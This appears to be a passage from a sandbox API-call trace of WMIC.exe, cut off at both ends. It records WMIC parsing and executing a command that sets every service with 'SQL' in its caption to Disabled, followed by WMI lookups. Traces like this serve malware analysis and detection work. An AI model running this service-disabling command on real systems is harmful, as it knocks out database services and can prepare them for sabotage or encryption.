0x5 [0115.698] SysStringLen (param_1="htable-sortby") returned 0xd [0115.698] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0115.698] SysStringLen (param_1="htable-sortby") returned 0xd [0115.698] SysStringLen (param_1="XML") returned 0x3 [0115.698] SysStringLen (param_1="htable-sortby") returned 0xd [0115.698] SysStringLen (param_1="texttablewsys") returned 0xd [0115.698] SysStringLen (param_1="htable-sortby") returned 0xd [0115.698] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0115.698] SysStringLen (param_1="XML") returned 0x3 [0115.698] SysStringLen (param_1="htable-sortby") returned 0xd [0115.699] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0115.699] SysStringLen (param_1="TABLE") returned 0x5 [0115.699] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0115.699] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0115.699] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0115.699] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0115.699] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0115.699] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0115.699] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0115.699] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0115.699] SysStringLen (param_1="wmiclimofformat") returned 0xf [0115.699] SysStringLen (param_1="TABLE") returned 0x5 [0115.699] SysStringLen (param_1="wmiclimofformat") returned 0xf [0115.699] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0115.699] SysStringLen (param_1="wmiclimofformat") returned 0xf [0115.699] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0115.699] SysStringLen (param_1="wmiclimofformat") returned 0xf [0115.699] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0115.699] SysStringLen (param_1="wmiclimofformat") returned 0xf [0115.699] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0115.699] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0115.699] SysStringLen (param_1="wmiclimofformat") returned 0xf [0115.700] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0115.700] SysStringLen (param_1="TABLE") returned 0x5 [0115.700] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0115.700] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0115.700] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0115.700] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0115.700] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0115.700] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0115.700] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0115.700] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0115.700] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0115.700] SysStringLen (param_1="TABLE") returned 0x5 [0115.700] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0115.700] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0115.700] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0115.700] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0115.700] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0115.700] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0115.700] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0115.700] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0115.700] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0115.700] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0115.701] FreeThreadedDOMDocument:IUnknown:Release (This=0xd145a8) returned 0x0 [0115.701] GetCommandLineW () returned="WMIC SERVICE WHERE 'caption LIKE '%SQL%'' CALL ChangeStartMode 'Disabled'" [0115.701] memcpy_s (in: _Destination=0x768058, _DestinationSize=0x9e, _Source=0x781588, _SourceSize=0x96 | out: _Destination=0x768058) returned 0x0 [0115.701] GetLocalTime (in: lpSystemTime=0x4ff86c | out: lpSystemTime=0x4ff86c*(wYear=0x7e2, wMonth=0x4, wDayOfWeek=0x0, wDay=0xf, wHour=0xa, wMinute=0x9, wSecond=0x8, wMilliseconds=0x234)) [0115.701] _vsnwprintf (in: _Buffer=0x768100, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x4ff84c | out: _Buffer="04-15-2018T10:09:08") returned 19 [0115.701] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SQL%'' CALL ChangeStartMode 'Disabled'") returned 71 [0115.701] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SQL%'' CALL ChangeStartMode 'Disabled'") returned 71 [0115.701] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SQL%'' CALL ChangeStartMode 'Disabled'") returned 71 [0115.701] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SQL%'' CALL ChangeStartMode 'Disabled'") returned 71 [0115.701] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SQL%'' CALL ChangeStartMode 'Disabled'") returned 71 [0115.701] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SQL%'' CALL ChangeStartMode 'Disabled'") returned 71 [0115.701] lstrlenW (lpString="SERVICE") returned 7 [0115.701] _wcsicmp (_String1="SERVICE", _String2="\"NULL\"") returned 81 [0115.701] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SQL%'' CALL ChangeStartMode 'Disabled'") returned 71 [0115.701] lstrlenW (lpString="WHERE") returned 5 [0115.701] _wcsicmp (_String1="WHERE", _String2="\"NULL\"") returned 85 [0115.701] memmove_s (in: _Destination=0x762c78, _DestinationSize=0x4, _Source=0x762c68, _SourceSize=0x4 | out: _Destination=0x762c78) returned 0x0 [0115.701] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SQL%'' CALL ChangeStartMode 'Disabled'") returned 71 [0115.701] lstrlenW (lpString="'caption LIKE '%SQL%''") returned 22 [0115.701] _wcsicmp (_String1="'caption LIKE '%SQL%''", _String2="\"NULL\"") returned 5 [0115.701] lstrlenW (lpString="'caption LIKE '%SQL%''") returned 22 [0115.701] lstrlenW (lpString="'caption LIKE '%SQL%''") returned 22 [0115.701] memmove_s (in: _Destination=0x767d28, _DestinationSize=0x8, _Source=0x762c78, _SourceSize=0x8 | out: _Destination=0x767d28) returned 0x0 [0115.702] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SQL%'' CALL ChangeStartMode 'Disabled'") returned 71 [0115.702] lstrlenW (lpString="CALL") returned 4 [0115.702] _wcsicmp (_String1="CALL", _String2="\"NULL\"") returned 65 [0115.702] memmove_s (in: _Destination=0x767e90, _DestinationSize=0xc, _Source=0x767d28, _SourceSize=0xc | out: _Destination=0x767e90) returned 0x0 [0115.702] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SQL%'' CALL ChangeStartMode 'Disabled'") returned 71 [0115.702] lstrlenW (lpString="ChangeStartMode") returned 15 [0115.702] _wcsicmp (_String1="ChangeStartMode", _String2="\"NULL\"") returned 65 [0115.702] memmove_s (in: _Destination=0x7622d8, _DestinationSize=0x10, _Source=0x767e90, _SourceSize=0x10 | out: _Destination=0x7622d8) returned 0x0 [0115.702] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SQL%'' CALL ChangeStartMode 'Disabled'") returned 71 [0115.702] lstrlenW (lpString="'Disabled'") returned 10 [0115.702] _wcsicmp (_String1="'Disabled'", _String2="\"NULL\"") returned 5 [0115.702] lstrlenW (lpString="'Disabled'") returned 10 [0115.702] lstrlenW (lpString="'Disabled'") returned 10 [0115.702] lstrlenW (lpString="QUIT") returned 4 [0115.702] lstrlenW (lpString="SERVICE") returned 7 [0115.702] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="QUIT", cchCount2=4) returned 3 [0115.702] lstrlenW (lpString="EXIT") returned 4 [0115.702] lstrlenW (lpString="SERVICE") returned 7 [0115.702] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="EXIT", cchCount2=4) returned 3 [0115.702] WbemLocator:IUnknown:AddRef (This=0x780500) returned 0x2 [0115.702] lstrlenW (lpString="/") returned 1 [0115.702] lstrlenW (lpString="SERVICE") returned 7 [0115.702] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="/", cchCount2=1) returned 3 [0115.702] lstrlenW (lpString="-") returned 1 [0115.702] lstrlenW (lpString="SERVICE") returned 7 [0115.702] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="-", cchCount2=1) returned 3 [0115.702] lstrlenW (lpString="CLASS") returned 5 [0115.702] lstrlenW (lpString="SERVICE") returned 7 [0115.702] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="CLASS", cchCount2=5) returned 3 [0115.702] lstrlenW (lpString="PATH") returned 4 [0115.702] lstrlenW (lpString="SERVICE") returned 7 [0115.702] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="PATH", cchCount2=4) returned 3 [0115.702] lstrlenW (lpString="CONTEXT") returned 7 [0115.702] lstrlenW (lpString="SERVICE") returned 7 [0115.702] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="CONTEXT", cchCount2=7) returned 3 [0115.702] lstrlenW (lpString="SERVICE") returned 7 [0115.702] lstrlenW (lpString="SERVICE") returned 7 [0115.703] GetCurrentThreadId () returned 0xf40 [0115.703] ??0CHString@@QAE@XZ () returned 0x4ff7c0 [0115.703] WbemLocator:IWbemLocator:ConnectServer (in: This=0x780500, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349540 | out: ppNamespace=0x1349540*=0x7b0a60) returned 0x0 [0115.724] CoSetProxyBlanket (pProxy=0x7b0a60, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0115.724] ??1CHString@@QAE@XZ () returned 0x74a66430 [0115.724] GetCurrentThreadId () returned 0xf40 [0115.724] ??0CHString@@QAE@XZ () returned 0x4ff768 [0115.724] SysStringLen (param_1="root\\cli") returned 0x8 [0115.724] SysStringLen (param_1="\\") returned 0x1 [0115.724] SysStringLen (param_1="root\\cli\\") returned 0x9 [0115.724] SysStringLen (param_1="ms_409") returned 0x6 [0115.725] WbemLocator:IWbemLocator:ConnectServer (in: This=0x780500, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349544 | out: ppNamespace=0x1349544*=0x7b0c40) returned 0x0 [0115.732] ??1CHString@@QAE@XZ () returned 0x74a66430 [0115.732] GetCurrentThreadId () returned 0xf40 [0115.732] ??0CHString@@QAE@XZ () returned 0x4ff7c4 [0115.733] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0115.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301478, cbMultiByte=-1, lpWideCharStr=0x768a60, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0115.733] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0115.733] SysStringLen (param_1="SERVICE") returned 0x7 [0115.733] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SERVICE") returned 0x23 [0115.733] SysStringLen (param_1="'") returned 0x1 [0115.733] IWbemServices:GetObject (in: This=0x7b0a60, strObjectPath="MSFT_CliAlias.FriendlyName='SERVICE'", lFlags=0, pCtx=0x0, ppObject=0x4ff7c0*=0x0, ppCallResult=0x0 | out: ppObject=0x4ff7c0*=0x7d5308, ppCallResult=0x0) returned 0x0 [0115.739] IWbemClassObject:Get (in: This=0x7d5308, wszName="Target", lFlags=0, pVal=0x4ff798*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4ff798*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_Service", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0115.739] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0115.739] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0115.740] IWbemClassObject:Get (in: This=0x7d5308, wszName="PWhere", lFlags=0, pVal=0x4ff798*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4ff798*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WHERE Name='#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0115.740] lstrlenW (lpString="WHERE Name='#'") returned 14 [0115.740] lstrlenW (lpString="WHERE Name='#'") returned 14 [0115.740] IWbemClassObject:Get (in: This=0x7d5308, wszName="Connection", lFlags=0, pVal=0x4ff798*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4ff798*(varType=0xd, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7d56c8, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0115.740] IUnknown:QueryInterface (in: This=0x7d56c8, riid=0x13069ac*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x4ff7b4 | out: ppvObject=0x4ff7b4*=0x7d56c8) returned 0x0 [0115.740] GetCurrentThreadId () returned 0xf40 [0115.740] ??0CHString@@QAE@XZ () returned 0x4ff734 [0115.740] IWbemClassObject:Get (in: This=0x7d56c8, wszName="Namespace", lFlags=0, pVal=0x4ff718*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4ff718*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0115.740] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0115.740] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0115.740] IWbemClassObject:Get (in: This=0x7d56c8, wszName="Locale", lFlags=0, pVal=0x4ff718*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7b7384, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4ff718*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0115.740] lstrlenW (lpString="ms_409") returned 6 [0115.740] lstrlenW (lpString="ms_409") returned 6 [0115.740] IWbemClassObject:Get (in: This=0x7d56c8, wszName="User", lFlags=0, pVal=0x4ff718*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7b7384, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4ff718*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0115.740] IWbemClassObject:Get (in: This=0x7d56c8, wszName="Password", lFlags=0, pVal=0x4ff718*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4ff718*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0115.740] IWbemClassObject:Get (in: This=0x7d56c8, wszName="Server", lFlags=0, pVal=0x4ff718*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4ff718*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0115.740] lstrlenW (lpString=".") returned 1 [0115.741] lstrlenW (lpString=".") returned 1 [0115.741] IWbemClassObject:Get (in: This=0x7d56c8, wszName="Authority", lFlags=0, pVal=0x4ff718*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7b7384, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4ff718*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0115.741] ??1CHString@@QAE@XZ () returned 0x74a66430 [0115.741] IUnknown:Release (This=0x7d56c8) returned 0x1 [0115.741] GetCurrentThreadId () returned 0xf40 [0115.741] ??0CHString@@QAE@XZ () returned 0x4ff724 [0115.741] IWbemClassObject:Get (in: This=0x7d5308, wszName="__RELPATH", lFlags=0, pVal=0x4ff70c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4ff70c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"Service\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0115.741] GetCurrentThreadId () returned 0xf40 [0115.741] ??0CHString@@QAE@XZ () returned 0x4ff6a0 [0115.741] ??0CHString@@QAE@PBG@Z () returned 0x4ff69c [0115.741] ??0CHString@@QAE@ABV0@@Z () returned 0x4ff61c [0115.741] ?Empty@CHString@@QAEXXZ () returned 0x74a66430 [0115.741] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x768aa0 [0115.741] ?Find@CHString@@QBEHPBG@Z () returned 0x1b [0115.741] ?Left@CHString@@QBE?AV1@H@Z () returned 0x4ff614 [0115.741] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x4ff618 [0115.741] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x4ff69c [0115.741] ??1CHString@@QAE@XZ () returned 0x1 [0115.741] ??1CHString@@QAE@XZ () returned 0x1 [0115.741] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x4ff610 [0115.741] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x4ff61c [0115.741] ??1CHString@@QAE@XZ () returned 0x1 [0115.741] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x768b00 [0115.741] ?Find@CHString@@QBEHPBG@Z () returned 0x7 [0115.741] ?Left@CHString@@QBE?AV1@H@Z () returned 0x4ff614 [0115.741] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x4ff618 [0115.741] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x4ff69c [0115.741] ??1CHString@@QAE@XZ () returned 0x1 [0115.741] ??1CHString@@QAE@XZ () returned 0x1 [0115.741] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x4ff610 [0115.741] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x4ff61c [0115.741] ??1CHString@@QAE@XZ () returned 0x74a66430 [0115.741] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x74a66424 [0115.741] ??1CHString@@QAE@XZ () returned 0x74a66430 [0115.741] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0115.742] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0115.742] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0115.742] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"Service\\\"") returned 0x26 [0115.742] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Service\\\"") returned 0x79 [0115.742] SysStringLen (param_1="\"") returned 0x1 [0115.742] IWbemServices:GetObject (in: This=0x7b0c40, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Service\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x4ff6ac*=0x0, ppCallResult=0x0 | out: ppObject=0x4ff6ac*=0x7d5aa8, ppCallResult=0x0) returned 0x0 [0115.744] IWbemClassObject:Get (in: This=0x7d5aa8, wszName="Text", lFlags=0, pVal=0x4ff678*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4ff678*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7befe0*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x7b3590, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0115.744] SafeArrayGetLBound (in: psa=0x7befe0, nDim=0x1, plLbound=0x4ff688 | out: plLbound=0x4ff688) returned 0x0 [0115.744] SafeArrayGetUBound (in: psa=0x7befe0, nDim=0x1, plUbound=0x4ff68c | out: plUbound=0x4ff68c) returned 0x0 [0115.744] SafeArrayGetElement (in: psa=0x7befe0, rgIndices=0x4ff6a4, pv=0x4ff690 | out: pv=0x4ff690) returned 0x0 [0115.744] SysStringLen (param_1="Service application management. ") returned 0x20 [0115.744] IUnknown:Release (This=0x7d5aa8) returned 0x0 [0115.744] ??1CHString@@QAE@XZ () returned 0x1 [0115.744] ??1CHString@@QAE@XZ () returned 0x74a66430 [0115.744] ??1CHString@@QAE@XZ () returned 0x74a66430 [0115.744] lstrlenW (lpString="Service application management. ") returned 32 [0115.744] lstrlenW (lpString="Service application management. ") returned 32 [0115.744] IUnknown:Release (This=0x7d5308) returned 0x0 [0115.745] ??1CHString@@QAE@XZ () returned 0x74a66430 [0115.745] lstrlenW (lpString="PATH") returned 4 [0115.745] lstrlenW (lpString="WHERE") returned 5 [0115.745] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WHERE", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3 [0115.745] lstrlenW (lpString="WHERE") returned 5 [0115.745] lstrlenW (lpString="WHERE") returned 5 [0115.745] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WHERE", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0115.745] lstrlenW (lpString="/") returned 1 [0115.745] lstrlenW (lpString="caption LIKE '%SQL%'") returned 20 [0115.745] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="caption LIKE '%SQL%'", cchCount1=20, lpString2="/", cchCount2=1) returned 3 [0115.745] lstrlenW (lpString="-") returned 1 [0115.745] lstrlenW (lpString="caption LIKE '%SQL%'") returned 20 [0115.745] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="caption LIKE '%SQL%'", cchCount1=20, lpString2="-", cchCount2=1) returned 3 [0115.745] lstrlenW (lpString="caption LIKE '%SQL%'") returned 20 [0115.745] lstrlenW (lpString="caption LIKE '%SQL%'") returned 20 [0115.745] lstrlenW (lpString="/") returned 1 [0115.745] lstrlenW (lpString="CALL") returned 4 [0115.745] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0115.745] lstrlenW (lpString="-") returned 1 [0115.745] lstrlenW (lpString="CALL") returned 4 [0115.745] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0115.745] lstrlenW (lpString="CALL") returned 4 [0115.745] lstrlenW (lpString="CALL") returned 4 [0115.745] lstrlenW (lpString="GET") returned 3 [0115.745] lstrlenW (lpString="CALL") returned 4 [0115.745] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0115.745] lstrlenW (lpString="LIST") returned 4 [0115.745] lstrlenW (lpString="CALL") returned 4 [0115.745] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0115.745] lstrlenW (lpString="SET") returned 3 [0115.745] lstrlenW (lpString="CALL") returned 4 [0115.745] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0115.745] lstrlenW (lpString="CREATE") returned 6 [0115.745] lstrlenW (lpString="CALL") returned 4 [0115.745] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0115.745] lstrlenW (lpString="CALL") returned 4 [0115.745] lstrlenW (lpString="CALL") returned 4 [0115.745] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0115.745] lstrlenW (lpString="/") returned 1 [0115.745] lstrlenW (lpString="ChangeStartMode") returned 15 [0115.745] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="/", cchCount2=1) returned 3 [0115.745] lstrlenW (lpString="-") returned 1 [0115.746] lstrlenW (lpString="ChangeStartMode") returned 15 [0115.746] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="-", cchCount2=1) returned 3 [0115.746] lstrlenW (lpString="ChangeStartMode") returned 15 [0115.746] lstrlenW (lpString="ChangeStartMode") returned 15 [0115.746] GetCurrentThreadId () returned 0xf40 [0115.746] ??0CHString@@QAE@XZ () returned 0x4fef2c [0115.746] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0115.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301478, cbMultiByte=-1, lpWideCharStr=0x768b50, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0115.746] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0115.746] SysStringLen (param_1="SERVICE") returned 0x7 [0115.746] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SERVICE") returned 0x23 [0115.746] SysStringLen (param_1="'") returned 0x1 [0115.746] IWbemServices:GetObject (in: This=0x7b0a60, strObjectPath="MSFT_CliAlias.FriendlyName='SERVICE'", lFlags=0, pCtx=0x0, ppObject=0x4fef08*=0x0, ppCallResult=0x0 | out: ppObject=0x4fef08*=0x7d5308, ppCallResult=0x0) returned 0x0 [0115.752] lstrlenW (lpString="CALL") returned 4 [0115.752] lstrlenW (lpString="CALL") returned 4 [0115.752] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0115.752] IWbemClassObject:Get (in: This=0x7d5308, wszName="Verbs", lFlags=0, pVal=0x4feec0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4feec0*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7bf400*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0x7bf1e0, rgsabound=((cElements=0xa, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0115.753] SafeArrayGetLBound (in: psa=0x7bf400, nDim=0x1, plLbound=0x4feed0 | out: plLbound=0x4feed0) returned 0x0 [0115.753] SafeArrayGetUBound (in: psa=0x7bf400, nDim=0x1, plUbound=0x4feed8 | out: plUbound=0x4feed8) returned 0x0 [0115.753] SafeArrayGetElement (in: psa=0x7bf400, rgIndices=0x4feee0, pv=0x4fef14 | out: pv=0x4fef14) returned 0x0 [0115.753] IWbemClassObject:Get (in: This=0x7d6cd0, wszName="Name", lFlags=0, pVal=0x4feeb0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x4feeb0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0115.753] lstrlenW (lpString="StartService") returned 12 [0115.753] lstrlenW (lpString="ChangeStartMode") returned 15 [0115.753] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="StartService", cchCount2=12) returned 1 [0115.753] IUnknown:Release (This=0x7d6cd0) returned 0x1 [0115.753] SafeArrayGetElement (in: psa=0x7bf400, rgIndices=0x4feee0, pv=0x4fef14 | out: pv=0x4fef14) returned 0x0 [0115.753] IWbemClassObject:Get (in: This=0x7d7200, wszName="Name", lFlags=0, 